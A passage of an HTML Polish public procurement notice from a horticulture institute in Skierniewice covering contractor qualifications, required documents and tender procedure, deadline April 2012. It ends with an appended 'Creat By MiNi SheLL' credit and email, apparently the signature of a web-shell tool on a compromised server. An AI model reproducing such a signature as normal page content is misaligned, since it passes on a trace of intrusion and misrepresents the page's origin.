Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca dysponuje lub będzie dysponował przy realizacji zamówienia:
a)	jedną osobą posiadającą odpowiednie kwalifikacje do pełnienia funkcji kierownika budowy, tj. ważne uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów i minimum  3 letnie doświadczenie pełnienia funkcji kierownika budowy,
b)	jedną osobą posiadającą odpowiednie kwalifikacje do pełnienia funkcji kierownika robót, tj. ważne uprawnienia budowlane do kierowania robotami w specjalności instalacji w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów i minimum  3 letnie doświadczenie pełnienia funkcji kierownika robót,
c)	jedną osobą posiadającą odpowiednie kwalifikacje do pełnienia funkcji projektanta, tj. ważne uprawnienia budowlane do projektowania w specjalności konstrukcyjno-budowlanej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów i minimum 3 letnie doświadczenie pełnienia funkcji projektanta,
d)	jedną osobą posiadającą odpowiednie kwalifikacje do pełnienia funkcji projektanta, tj. ważne uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów i minimum 3 letnie doświadczenie pełnienia funkcji projektanta.
Osoby, które będą uczestniczyć w wykonywaniu zamówienia muszą posiadać wymagane uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, w odpowiedniej specjalności, zgodnie z wymaganiami ustawy Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.) oraz zgodnie z ustawą o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa dla eksperta, który będzie pełnił samodzielną funkcję związaną z realizacją zamówienia wraz z potwierdzeniem przynależności do Izby Inżynierów.
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że:
posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 200.000,-zł.  
Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana wg formuły spełnia - nie spełnia wyłącznie w oparciu o oświadczenia i dokumenty załączone do oferty</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykaz części zamówienia powierzony podwykonawcy/om (jeśli dotyczy).
2. Oryginał lub kopię pełnomocnictwa. 2.1. dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu Wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych (np. aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, odpis z właściwego rejestru). 2.2. dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy - dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia. Zgodnie z art. 23 ust. 2 ustawy wykonawcy ubiegający się wspólnie o udzielenie zamówienia zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Wymagana jest forma, rodzaj i zakres pełnomocnictwa właściwy do poszczególnych czynności. W przypadku złożenia kopii pełnomocnictwa, musi być ona potwierdzona za zgodność z oryginałem notarialnie. 3. Wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu, na potencjał innych podmiotów załączy pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. 4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: - Wykonawcy ci ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, - Wykonawcy ci składają jeden wniosek, przy czym: - dokumenty wymienione w pkt III.4.2 potwierdzające, że Wykonawca nie podlega wykluczeniu składa każdy z Wykonawców oddzielnie, - pozostałe dokumenty składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zakazuje się zmian istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy z wyłączeniem:
1)	możliwości zmiany terminu realizacji w przypadku wystąpienia zdarzeń losowych, niezależnych od Stron. Pod pojęciem zdarzeń losowych Strony rozumieją okoliczności, które pomimo zachowania należytej staranności są nieprzewidywalne oraz którym nie można zapobiec lub przeciwstawić się skutecznie np. klęska żywiołowa, strajk. Termin określony w § 4 ust. 2 umowy może ulec przedłużeniu o okres trwania przeszkody uniemożliwiającej realizację umowy,
  2) możliwości zmiany terminu realizacji w przypadku wystąpienia długotrwałego pozyskiwania dodatkowych uzgodnień, decyzji administracyjnych, niezbędnych do uzyskania pozwolenia na budowę, powstania potrzeby przeprowadzenia dodatkowych badań lub ekspertyz,
 3) możliwości zmiany terminu realizacji w przypadku napotkania w terenie warunków fizycznych nieprzewidywalnych, mających wpływ na wydłużenie procesu inwestycyjnego,
4) możliwości zmiany danych adresowych i podmiotowych Zamawiającego 
i Wykonawcy,
2.	Zmiany i uzupełnienia niniejszej umowy wymagają zachowania formy pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.inhort.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Ogrodnictwa, Oddział Sadownictwa, 96-100 Skierniewice, ul. Pomologiczna 18 pok. nr 19.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2012 godzina 11:00, miejsce: Instytut Ogrodnictwa, Oddział Sadownictwa, 96-100 Skierniewice, ul. Pomologiczna 18 pok. nr 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com